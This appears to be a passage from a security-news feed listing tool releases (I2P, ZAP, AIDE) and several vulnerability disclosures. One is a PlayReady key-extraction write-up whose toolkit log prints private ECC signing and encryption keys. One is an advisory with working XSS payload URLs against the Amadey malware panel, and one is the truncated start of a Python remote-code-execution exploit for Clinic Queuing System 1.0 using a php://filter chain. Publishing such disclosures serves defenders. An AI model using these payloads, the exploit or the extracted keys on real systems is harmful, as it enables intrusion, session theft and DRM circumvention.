I2P is an anonymizing network, offering a simple layer that identity-sensitive applications can use to securely communicate. All data is wrapped with several layers of encryption, and the network is both distributed and dynamic, with no trusted parties. This is the source code release version.

I2P 2.5.1

The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually. This is the cross platform package.

Zed Attack Proxy 2.15.0 Cross Platform Package

AIDE (Advanced Intrusion Detection Environment) is a free replacement for Tripwire(tm). It generates a database that can be used to check the integrity of files on server. It uses regular expressions for determining which files get added to the database. You can use several message digest algorithms to ensure that the files have not been tampered with.

AIDE 0.18.8

The Security Explorations team has come up with two attack scenarios that make it possible to extract private ECC keys used by a PlayReady client (Windows SW DRM scenario) for the communication with a license server and identity purposes. Proof of concept included.

    Hello All,We have come up with two attack scenarios that make it possible toextract private ECC keys used by a PlayReady client (Windows SW DRMscenario) for the communication with a license server and identitypurposes.More specifically, we successfully demonstrated the extraction of thefollowing keys:- private signing key used to digitally sign license requests issuedby PlayReady client,- private encryption key used to decrypt license responses received bythe client (decrypt license blobs carrying encrypted content keys).A proof for the above (which Microsoft should be able to confirm) isavailable at this link:https://security-explorations.com/samples/wbpmp_id_compromise_proof.txtWhile PlayReady security is primary about security of content keys,ECC keys that make up client identity are even more important. Uponcompromise, these keys can be used to mimic a PlayReady client outsideof a Protected Media Path environment and regardless of the imposedsecurity restrictions.In that context, extraction of ECC keys used as part of a PlayReadyclient identity constitute an ultimate compromise of a PlayReadyclient on Windows ("escape" of the PMP environment, ability to requestlicenses and decrypt content keys).Content key extraction from Protected Media Path process (through XORkey or white-box crypto data structures) in a combination with thislatest identity compromise attack means that there is nothing left tobreak when it comes to Windows SW DRM implementation.Let this serve as a reminder that PlayReady content protectionimplemented in software and on a client side has little chances of a“survival” (understood as a state of not being successfully reverseengineered and compromised). In that context, this is vendor’sresponsibility to constantly increase the bar and with the use of allavailable technological means.Thank you.Best Regards,Adam Gowdiak----------------------------------Security Explorations -AG Security Research Labhttps://security-explorations.com----------------------------------Packet Storm Editor Note - below is wbpmp_id_compromise_proof.txtc:\_MNT\PROJECTS\WBPMP\code\toolkit>shell# MS Play Ready / Canal+ VOD toolkit# (c) Security Explorations    2016-2019 Poland# (c) AG Security Research     2019-2022 Polandloaded cdn      [CDN helper]loaded mspr     [MS Play Ready toolkit]loaded vod      [CANALP VOD toolkit]loaded cgaweb   [CANALP CGAWeb toolkit]msprcp> set CDM_DIR cdm\w10msprcp> identity0C86330B0E98CD7C586F336088DAFA0E4F72F3CBDC81C849F635AE556A73679F902B255736B6E891F3AF30F98B0A5DBAD9A5C7A90F8DEA029AA8FB1C95887BE3E82DFAE7A9DB21FC1ECF33C1DADC54B7msprcp> identity 0C86330B0E98CD7C586F336088DAFA0E -v[0C86330B0E98CD7C586F336088DAFA0E]PRKF version: 3   attr: 100c Unknown   data     0000:  00 04 00 00                                      ....   attr: 1000 Unknown   data     0000:  00 01 10 01 00 00 00 2c 00 02 00 80 00 01 00 00  .......,........     0010:  ea 3c 67 da 4e 43 de e0 00 00 00 10 30 e1 4c db  .<g.NC......0.L.     0020:  9d 23 9e 97 f7 1d ac 03 13 c2 2b 69 00 01 10 02  .#........+i....     0030:  00 00 00 7c 00 01 01 00 00 00 00 40 cb 27 6f 9f  ...|.......@.'o.     0040:  9f 76 46 64 54 23 19 ef 9c c7 69 0f 9c 3b e3 75  .vFdT#....i..;.u     0050:  8b d3 78 2a 8d 03 fb a8 bf 9e 1c 6d f7 10 1c 69  ..x*.......m...i     0060:  94 2c 4d 07 d9 68 8b 61 09 85 bb d3 4e e8 58 20  .,M..h.a....N.X.     0070:  e2 0c c9 bc a9 a8 1e b7 f6 59 65 7d 00 62 e4 7a  .........Ye}.b.z     0080:  4a 93 87 21 00 00 00 20 93 de eb 4b ab b4 b2 c1  J..!.......K....     0090:  71 9b 3c fc cf a8 b9 7e f2 a9 4f e1 07 39 17 fd  q.<.......O..9..     00a0:  23 10 72 8a 29 95 bf d8 00 01 10 11 00 00 00 3c  #.r.)..........<     00b0:  00 02 00 80 2d 82 c1 90 50 2c e7 55 00 00 00 10  ....-...P,.U....     00c0:  8f 03 13 45 06 c3 b4 3e fb 7f 1d 77 e8 ca 2d 07  ...E...>...w..-.     00d0:  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................     00e0:  00 00 00 00                                      ....   attr: 1009 Identities     IdentityInfo       pubkey         0000:  f0 34 a0 f4 28 79 dc a4 73 88 c8 fa a6 46 40 94  .4..(y..s....F@.         0010:  ef 10 f7 4b f4 42 5e 2e 51 c1 08 67 9d 9a 4b 2e  ...K.B^.Q..g..K.         0020:  af 2b ed 89 8e dd bb eb 1b ad 68 df 9c 33 d2 8b  .+........h..3..         0030:  1d f3 a5 77 1a d2 a0 a3 b9 4d 83 6d 24 a4 2a 03  ...w.....M.m$.*.       prvkey         0000:  31 d5 b7 ab dd 28 44 52 3b 8a ac 6c e2 c5 4e 34  1....(DR;..l..N4         0010:  61 1d 97 8f e1 4f 63 e9 c0 14 8a 83 6c 5f 3f cc  a....Oc.....l_?.     IdentityInfo       pubkey         0000:  42 b2 a0 ff 38 1c 34 cc 67 06 3b 50 e1 2e 0d de  B...8.4.g.;P....         0010:  74 49 55 29 38 ef 66 0c 60 5c 90 9f 8c b0 49 43  tIU)8.f.......IC         0020:  0f e7 a8 1f 2f 67 5a b2 90 5c 3e 2e 99 62 19 b4  ..../gZ...>..b..         0030:  4a 39 8b 23 64 5e 4c d7 cc 95 38 bd 3c d3 2b f7  J9.#d^L...8.<.+.       prvkey         0000:  d7 60 5c 71 57 a0 01 7c 58 e2 e7 79 a8 b1 12 55  ...qW..|X..y...U         0010:  1d 72 14 f0 d9 2c ef 04 6c cc 57 c1 2e 9b e3 b4  .r...,..l.W.....     IdentityInfo       pubkey         0000:  cb 27 6f 9f 9f 76 46 64 54 23 19 ef 9c c7 69 0f  .'o..vFdT#....i.         0010:  9c 3b e3 75 8b d3 78 2a 8d 03 fb a8 bf 9e 1c 6d  .;.u..x*.......m         0020:  f7 10 1c 69 94 2c 4d 07 d9 68 8b 61 09 85 bb d3  ...i.,M..h.a....         0030:  4e e8 58 20 e2 0c c9 bc a9 a8 1e b7 f6 59 65 7d  N.X..........Ye}       prvkey         0000:  4c 33 c6 8e 0e f1 b6 f1 0c d5 31 6b 40 94 aa 68  L3........1k@..h         0010:  32 cc 68 1b 00 3b fc 65 8b c4 3c e3 cb 62 de fc  2.h..;.e..<..b..         0020:  11 ef 51 7b 92 73 a1 84 24 ac 71 33 cf 76 d3 05  ..Q{.s..$.q3.v..         0030:  44 2d 4e 12 79 3f 3f 09 7a 4e 4d 51 ac 78 a7 3c  D-N.y??.zNMQ.x.<         0040:  6b                                               k   IdentityCertChain     CERT CHAIN:       ### CERT         - random           0000:  07 80 59 24 9a b6 7e 48 c3 7f 6d 38 30 af f0 b6  ..Y$...H..m80...         - seclevel 2000         - uniqueid           0000:  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................         - pubkey_sign           0000:  42 b2 a0 ff 38 1c 34 cc 67 06 3b 50 e1 2e 0d de  B...8.4.g.;P....           0010:  74 49 55 29 38 ef 66 0c 60 5c 90 9f 8c b0 49 43  tIU)8.f.......IC           0020:  0f e7 a8 1f 2f 67 5a b2 90 5c 3e 2e 99 62 19 b4  ..../gZ...>..b..           0030:  4a 39 8b 23 64 5e 4c d7 cc 95 38 bd 3c d3 2b f7  J9.#d^L...8.<.+.         - pubkey_enc           0000:  cb 27 6f 9f 9f 76 46 64 54 23 19 ef 9c c7 69 0f  .'o..vFdT#....i.           0010:  9c 3b e3 75 8b d3 78 2a 8d 03 fb a8 bf 9e 1c 6d  .;.u..x*.......m           0020:  f7 10 1c 69 94 2c 4d 07 d9 68 8b 61 09 85 bb d3  ...i.,M..h.a....           0030:  4e e8 58 20 e2 0c c9 bc a9 a8 1e b7 f6 59 65 7d  N.X..........Ye}         - digest           0000:  c5 c4 33 e5 4e b0 c5 b3 5b e9 89 9b de 89 b4 cd  ..3.N...[.......           0010:  e5 e1 c3 bb 80 c3 88 87 17 40 95 0b 3a 82 cc 89  .........@..:...         - signature           0000:  23 ce 2a 20 50 24 8f 32 3d 5a 08 5c 88 dd 65 dd  #.*.P$.2=Z....e.           0010:  93 66 be ec 7a d5 c6 39 80 66 c1 f5 36 4e b7 08  .f..z..9.f..6N..           0020:  9d 7b 59 05 79 3b 49 08 4f 94 af 7f b8 96 4e 81  .{Y.y;I.O.....N.           0030:  bd ff fe 38 61 d8 08 90 96 2c b6 32 ee ba 75 5f  ...8a....,.2..u_         - signkey           0000:  59 86 b7 a2 a9 d6 b3 06 1f 5d 20 08 f6 97 ee f5  Y........]......           0010:  bc c6 15 cb e6 4e f9 60 7a 83 55 3d c0 3a 21 b6  .....N..z.U=.:!.           0020:  d4 c7 33 e2 71 7e 1c ad 00 e5 20 70 87 64 66 9e  ..3.q......p.df.           0030:  ee 5f 4d 78 b1 c6 42 3a f9 6f af 6a 44 cf ef 3d  ._Mx..B:.o.jD..=         - sig status: BAD SIGNATURE       ### CERT         - names           * Microsoft           * Windows           * 6.4.9.000         - random           0000:  28 37 b2 3d a4 70 a4 7f f0 8c 69 78 3c 6c 38 cd  (7.=.p....ix<l8.         - seclevel 2000         - uniqueid           0000:  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................         - pubkey_sign           0000:  59 86 b7 a2 a9 d6 b3 06 1f 5d 20 08 f6 97 ee f5  Y........]......           0010:  bc c6 15 cb e6 4e f9 60 7a 83 55 3d c0 3a 21 b6  .....N..z.U=.:!.           0020:  d4 c7 33 e2 71 7e 1c ad 00 e5 20 70 87 64 66 9e  ..3.q......p.df.           0030:  ee 5f 4d 78 b1 c6 42 3a f9 6f af 6a 44 cf ef 3d  ._Mx..B:.o.jD..=         - digest           0000:  68 d5 b6 78 9c 6c c4 63 36 50 62 4a cc 20 c0 08  h..x.l.c6PbJ....           0010:  16 1b 0a e9 31 0c 68 97 dc eb 1a 41 1b df 6b 75  ....1.h....A..ku         - signature           0000:  c2 a3 13 ec e8 a9 f0 77 70 df 3d 8b 2b ed 08 68  .......wp.=.+..h           0010:  b0 79 c9 d2 40 84 26 a9 1d 16 00 4a 73 76 81 c7  .y..@.&....Jsv..           0020:  aa 1f 75 78 6d 17 20 6e 15 e1 8f 2d 39 c8 db 05  ..uxm..n...-9...           0030:  00 0d b5 6f 88 27 04 ed a4 8f 24 7f c7 f7 da b4  ...o.'....$.....         - signkey           0000:  e7 3a 1b a7 c0 65 9e 6d 2f 45 5c 9d 80 91 cc da  .:...e.m/E......           0010:  96 c9 63 6b 4f 63 a1 78 18 f5 54 e4 bd 19 97 14  ..ckOc.x..T.....           0020:  81 07 fe d9 8a bf 0e 6b 8e 96 81 58 e6 90 7c a7  .......k...X..|.           0030:  df 1d 66 cf a3 58 f7 7b 1c 4e 62 d0 28 11 56 9c  ..f..X.{.Nb.(.V.         - sig status: OK       ### CERT         - names           * Microsoft           * PlayReady SL2000 Device Port- Windows Lib Codebase Version CA           * 1.0.0.4         - random           0000:  db 51 85 24 63 ac 07 0b aa c9 91 f9 c4 0a 07 2a  .Q.$c..........*         - seclevel 2000         - uniqueid           0000:  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................         - pubkey_sign           0000:  e7 3a 1b a7 c0 65 9e 6d 2f 45 5c 9d 80 91 cc da  .:...e.m/E......           0010:  96 c9 63 6b 4f 63 a1 78 18 f5 54 e4 bd 19 97 14  ..ckOc.x..T.....           0020:  81 07 fe d9 8a bf 0e 6b 8e 96 81 58 e6 90 7c a7  .......k...X..|.           0030:  df 1d 66 cf a3 58 f7 7b 1c 4e 62 d0 28 11 56 9c  ..f..X.{.Nb.(.V.         - digest           0000:  63 70 b4 92 33 b1 cf 78 7f 9e 36 01 29 e0 29 b2  cp..3..x..6.).).           0010:  f7 cf b1 cc 0b 71 5d 6a 02 24 df 01 75 d2 2f 0e  .....q]j.$..u./.         - signature           0000:  99 f3 5b 4b 55 a8 8d a8 bd 18 db 94 8e b0 31 1f  ..[KU.........1.           0010:  14 a4 43 41 64 f7 fd 81 cd 1e 57 68 0e f1 2c 40  ..CAd.....Wh..,@           0020:  c4 c2 19 20 78 37 41 07 c1 e3 54 ec fb 64 19 18  ....x7A...T..d..           0030:  13 5b 2c 5a 34 7f 1f 48 7a 88 5a 02 33 e5 b9 76  .[,Z4..Hz.Z.3..v         - signkey           0000:  7d 91 d4 6d 44 f0 29 2a bd b9 72 d7 9b dc bc f8  }..mD.)*..r.....           0010:  35 ad 17 27 cb c8 35 37 7e 91 43 58 44 f9 1b 3f  5..'..57..CXD..?           0020:  71 be 7c 6b 04 0d bf d4 f7 80 8b 7a 0c 47 f7 82  q.|k.......z.G..           0030:  30 2b 9c 29 5f 05 eb c3 92 71 f5 47 88 41 fd 1b  0+.)_....q.G.A..         - sig status: OK       ### CERT         - names           * Microsoft           * PlayReady SL2000 Device Port - Windows Platform CA for x86/amd64           * 1.0.0.3         - random           0000:  4a ee c4 a0 0d c9 57 ab 14 52 de 28 54 42 f3 84  J.....W..R.(TB..         - seclevel 2000         - uniqueid           0000:  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................         - pubkey_sign           0000:  7d 91 d4 6d 44 f0 29 2a bd b9 72 d7 9b dc bc f8  }..mD.)*..r.....           0010:  35 ad 17 27 cb c8 35 37 7e 91 43 58 44 f9 1b 3f  5..'..57..CXD..?           0020:  71 be 7c 6b 04 0d bf d4 f7 80 8b 7a 0c 47 f7 82  q.|k.......z.G..           0030:  30 2b 9c 29 5f 05 eb c3 92 71 f5 47 88 41 fd 1b  0+.)_....q.G.A..         - digest           0000:  2f ad a9 0e 8f 7e 82 47 7a 2e 82 c3 6d 0c 20 c7  /......Gz...m...           0010:  0b 58 95 d7 2e 85 21 28 83 b1 9c 27 0b 49 dc 21  .X....!(...'.I.!         - signature           0000:  9e fb bf 14 68 cc 5e 0f db 21 7d 11 dc 67 4a 23  ....h.^..!}..gJ#           0010:  71 c7 ac 34 73 bb 48 ee a3 33 c3 c9 55 62 2e c2  q..4s.H..3..Ub..           0020:  bb 36 01 af cd dc 88 48 01 fa d2 2b 4b 3f e3 75  .6.....H...+K?.u           0030:  48 44 98 40 9d db 53 0f 44 25 a5 65 fd 29 61 7e  HD.@..S.D%.e.)a.         - signkey           0000:  a1 87 e3 42 5c 05 f7 a4 52 85 d6 fe c8 17 f7 3b  ...B....R......;           0010:  69 64 74 e2 b9 e1 61 4b a3 fa 51 b9 ad fe 9d 27  idt...aK..Q....'           0020:  3f 6a 4e 50 75 e0 1d f2 ab 18 61 e7 c2 e1 9b d2  ?jNPu.....a.....           0030:  87 99 86 8f 97 f7 cb a2 1d 97 73 19 ba b8 be 92  ..........s.....         - sig status: OK       ### CERT         - names           * Microsoft           * PlayReady SL2000 Device Port + Link CA           * 1.0.0.1         - random           0000:  ec aa b6 cd 0b 16 ca df e9 a8 82 52 b4 58 9c a9  ...........R.X..         - seclevel 2000         - uniqueid           0000:  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................         - pubkey_sign           0000:  a1 87 e3 42 5c 05 f7 a4 52 85 d6 fe c8 17 f7 3b  ...B....R......;           0010:  69 64 74 e2 b9 e1 61 4b a3 fa 51 b9 ad fe 9d 27  idt...aK..Q....'           0020:  3f 6a 4e 50 75 e0 1d f2 ab 18 61 e7 c2 e1 9b d2  ?jNPu.....a.....           0030:  87 99 86 8f 97 f7 cb a2 1d 97 73 19 ba b8 be 92  ..........s.....         - digest           0000:  ed 0f 33 d6 b4 ab f0 8d c0 1a 47 1f d0 13 68 0e  ..3.......G...h.           0010:  0c 12 e3 a9 ce d3 00 f9 9b 45 af 61 f1 68 4d 64  .........E.a.hMd         - signature           0000:  31 60 bc 8c 1f 0e 5e fe ea 80 83 79 b4 ad 02 74  1.....^....y...t           0010:  f1 c9 20 f9 c8 93 f0 ca 5c c7 72 e6 5c 97 8e 88  ..........r.....           0020:  a8 9f c5 b0 7b b6 d0 8f 50 33 20 fa 34 03 4a ea  ....{...P3..4.J.           0030:  68 91 01 d2 f0 cb 0f fa 4d 51 5c 25 93 c8 c2 12  h.......MQ.%....         - signkey           0000:  86 4d 61 cf f2 25 6e 42 2c 56 8b 3c 28 00 1c fb  .Ma..%nB,V.<(...           0010:  3e 15 27 65 85 84 ba 05 21 b7 9b 18 28 d9 36 de  >.'e....!...(.6.           0020:  1d 82 6a 8f c3 e6 e7 fa 7a 90 d5 ca 29 46 f1 f6  ..j.....z...)F..           0030:  4a 2e fb 9f 5d cf fe 7e 43 4e b4 42 93 fa c5 ab  J...]...CN.B....         - sig status: OK   attr: 1010 Unknown   data     0000:  00 02 00 80 2d 82 c1 90 50 2c e7 55 00 00 00 10  ....-...P,.U....     0010:  9e 53 d0 8b 82 43 90 08 bb f4 25 2d 06 1d 79 0e  .S...C....%-..y.     0020:  b1 ff 09 8d 5a 7c 52 4d ae 22 40 b0 5e c8 4d 33  ....Z|RM."@.^.M3     0030:  00 05 00 00                                      ....   attr: 1013 Unknown   data     0000:  00 00 00 01 00 00 00 10 30 b3 3e b8 a1 31 ae 42  ........0.>..1.B     0010:  ab 0d 43 74 c5 15 cd e0                          ..Ct....   attr: 1014 Unknown   data     0000:  19 ec 66 7f 93 64 89 46 95 47 89 1d a5 37 12 f1  ..f..d.F.G...7..   SignerCertChain     CERT CHAIN:       ### CERT         - names           * Microsoft           * Microsoft KeyFileSigner           * 1.0.0.1         - random           0000:  f0 6a b7 09 88 a4 c7 c8 1d f9 5c 6d cd e4 ab 52  .j.........m...R         - seclevel 2000         - uniqueid           0000:  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................         - pubkey_sign           0000:  97 41 fa 59 bd 5e b8 22 80 b2 a9 e2 dd e5 70 87  .A.Y.^."......p.           0010:  ce 91 07 e4 3b 12 81 69 fb a9 94 48 37 f4 9e 46  ....;..i...H7..F           0020:  bb b7 11 b9 8f 4e c8 17 96 50 9d 05 f5 98 f7 a7  .....N...P......           0030:  5c 44 56 2d 4d 2a c3 4d 48 1a c7 4a 1d 48 16 c4  .DV-M*.MH..J.H..         - digest           0000:  b9 e0 29 a8 59 21 9c de c1 b5 75 58 4c e6 6d e3  ..).Y!....uXL.m.           0010:  08 8c 3e 43 05 14 26 fa 8d c0 3e a5 df f3 df bc  ..>C..&...>.....         - signature           0000:  c8 b0 b2 4d 59 da e8 2b a5 b1 ac 61 95 54 85 ea  ...MY..+...a.T..           0010:  32 a1 19 5f 45 9c 0d 54 a0 cf 43 86 54 64 41 c0  2.._E..T..C.TdA.           0020:  8a 02 e7 0d e1 49 aa 40 26 61 a9 e0 b8 77 d9 ac  .....I.@&a...w..           0030:  1e 2d 3f 2c 7f 7c 29 82 74 c3 74 f9 11 5d f0 81  .-?,.|).t.t..]..         - signkey           0000:  af 6f af 3a 41 e4 a2 b9 eb cd 8c 95 a5 05 9b 11  .o.:A...........           0010:  38 a3 97 2a 1e c0 72 e3 24 52 78 b9 b5 49 28 f3  8..*..r.$Rx..I(.           0020:  e0 28 3e 78 51 5d eb 6f 56 93 1a 5a 28 f3 aa b3  .(>xQ].oV..Z(...           0030:  04 c7 1f b5 b4 c7 f4 92 59 ed 21 f8 65 14 ec 33  ........Y.!.e..3         - sig status: OK       ### CERT         - names           * Microsoft           * PlayReady SL2000 KeyFileSigner Root CA           * 1.0.0.1         - random           0000:  d6 ac 35 b4 d8 5d b4 30 74 0c ac 05 ea 0c 1e 86  ..5..].0t.......         - seclevel 2000         - uniqueid           0000:  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................         - pubkey_sign           0000:  af 6f af 3a 41 e4 a2 b9 eb cd 8c 95 a5 05 9b 11  .o.:A...........           0010:  38 a3 97 2a 1e c0 72 e3 24 52 78 b9 b5 49 28 f3  8..*..r.$Rx..I(.           0020:  e0 28 3e 78 51 5d eb 6f 56 93 1a 5a 28 f3 aa b3  .(>xQ].oV..Z(...           0030:  04 c7 1f b5 b4 c7 f4 92 59 ed 21 f8 65 14 ec 33  ........Y.!.e..3         - digest           0000:  71 01 a1 dd 80 f2 79 7a 2e 3c f2 f6 b9 bf 78 b0  q.....yz.<....x.           0010:  ed 65 93 d5 42 cf 17 d4 0a c7 fa b0 18 82 3b 2f  .e..B.........;/         - signature           0000:  af 18 1d 1a 7d 98 92 c5 df 3e ac b3 2a 17 d2 29  ....}....>..*..)           0010:  92 e9 7f 4c 0f b1 5a 3d bd 91 d9 e2 bb b9 34 87  ...L..Z=......4.           0020:  e7 9b 00 bb 78 02 1f 5c a8 e0 f2 e0 0b d3 f9 b5  ....x...........           0030:  1a c5 e6 fe dd cd b4 1c 3f d7 89 d1 62 6a 5a 0b  ........?...bjZ.         - signkey           0000:  86 4d 61 cf f2 25 6e 42 2c 56 8b 3c 28 00 1c fb  .Ma..%nB,V.<(...           0010:  3e 15 27 65 85 84 ba 05 21 b7 9b 18 28 d9 36 de  >.'e....!...(.6.           0020:  1d 82 6a 8f c3 e6 e7 fa 7a 90 d5 ca 29 46 f1 f6  ..j.....z...)F..           0030:  4a 2e fb 9f 5d cf fe 7e 43 4e b4 42 93 fa c5 ab  J...]...CN.B....         - sig status: OKmsprcp> identity 0C86330B0E98CD7C586F336088DAFA0E -e 0C86330B0E98CD7C586F336088DAFA0E0C86330B0E98CD7C586F336088DAFA0E.enc.pub (public encryption key)0C86330B0E98CD7C586F336088DAFA0E.enc.prv (private encryption key)0C86330B0E98CD7C586F336088DAFA0E.sig.pub (public signing key)0C86330B0E98CD7C586F336088DAFA0E.sig.prv (private signing key)msprcp> checkkeypair 0C86330B0E98CD7C586F336088DAFA0E.enc.prv.plain 0C86330B0E98CD7C586F336088DAFA0E.enc.pubKEY CHECK:- prv: 7704db9c130887d60a2c61b1891bbad64676ba56fe146fc6ecc2be993c1cb53d- pub:  X: cb276f9f9f764664542319ef9cc7690f9c3be3758bd3782a8d03fba8bf9e1c6d  Y: f7101c69942c4d07d9688b610985bbd34ee85820e20cc9bca9a81eb7f659657dKEY CHECK OKmsprcp>

Microsoft PlayReady Complete Client Identity Compromise

Panel Amadey.d.c malware suffers from cross site scripting vulnerabilities.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/50467c891bf7de34d2d65fa93ab8b558.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Panel Amadey.d.cVulnerability: Cross Site Scripting (XSS)Family: AmadeyType: Web PanelMD5: 50467c891bf7de34d2d65fa93ab8b558 (Login.php)SHA256: 65623eead2bcba66817861246e842386d712c38c5c5558e50eb49cffa2a1035dVuln ID: MVID-2024-0680Disclosure: 05/09/2024Description: The Amadey C2 web panel is written in PHP for remote administration capability. The Login.php webpage accepts HTTP GET "l" and "p" parameters which are passed to the backend server side code: $_GET["l"]  name=\"login\",  $_GET["p"] , name=\"password\". However, there is no secure coding practice of filtering input or sanitization of output. Panel users who visit a third-party attacker website or click an infected link, can trigger arbitrary client side JS code execution in the security context of the current user. This can result in data theft or GEO location disclosure of the user accessing the Amadey web interface.The submit button contains the text "Unlock".Entering incorrect password results in URI of "?wrong=1" and displays "Wrong login or password", after a few seconds delay redirects back to Login.php.http://127.0.0.1/Panel.Amadey.d.c/Login.php?wrong=1Wrong login or passwordThe web panel HTML source code for the URL "Login.php?wrong=1" contains the letters "CC" plus the Domain/IP within brackets[x.x.x.x] within the HTML title tag. %3Ctitle%3E CC [127.0.0.1] %3C/title%3ETested successfully in Firefox.Exploit/PoC:Vulnerable parameters: "l" and "p"http://x.x.x.x/Panel.Amadey.d.c/Login.php?l=%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ehttp://x.x.x.x/Panel.Amadey.d.c/Login.php?p=%22/%3E%3Cscript%3Ealert(666)%3C/script%3EDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Panel Amadey.d.c MVID-2024-0680 Cross Site Scripting

Clinic Queuing System version 1.0 suffers from a remote code execution vulnerability.

    # Exploit Title: Clinic Queuing System 1.0 RCE # Date: 2024/1/7# Exploit Author: Juan Marco Sanchez# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/16439/clinic-queuing-system-using-php-and-sqlite3-source-code-free-download.html# Version: 1.0# Tested on: Debian Linux Apache Web Server# CVE: CVE-2024-0264 and CVE-2024-0265import requestsimport randomimport argparsefrom bs4 import BeautifulSoupparser = argparse.ArgumentParser()parser.add_argument("target")args = parser.parse_args()base_url = args.targetphase1_url = base_url + '/LoginRegistration.php?a=save_user'phase2_url = base_url + '/LoginRegistration.php?a=login'filter_chain = "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|conver